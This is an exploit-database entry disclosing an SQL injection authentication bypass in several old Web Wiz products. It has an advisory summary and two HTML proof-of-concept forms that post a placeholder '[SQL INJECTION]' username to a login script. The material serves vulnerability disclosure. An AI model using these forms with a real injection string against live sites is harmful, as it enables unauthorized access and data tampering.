Web Wiz (Multiple Products) - SQL Injection

2005-12-30T00:00:00
ID EXPLOITPACK:A507A703A5865C840B047750C6D4FE05
Type exploitpack
Reporter DevilBox
Modified 2005-12-30T00:00:00

Description

Web Wiz (Multiple Products) - SQL Injection

                                        
                                            source: https://www.securityfocus.com/bid/16085/info

Multiple Products by Web Wiz are prone to an SQL injection vulnerability.

Successful exploitation can allow an attacker to bypass authentication and gain unauthorized access to a site.

Attacks may also result in disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

Web Wiz Site News 3.06 for Access 2000 and Access 97, Web Wiz Journal 1.0 for Access 2000 and Access 97, Web Wiz Polls 3.06 for Access 2000 and Access 97, Web Wiz Database Login 1.71 for Access 2000 and Access 97 are vulnerable to this issue. Prior versions are reportedly affected as well. 

<html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>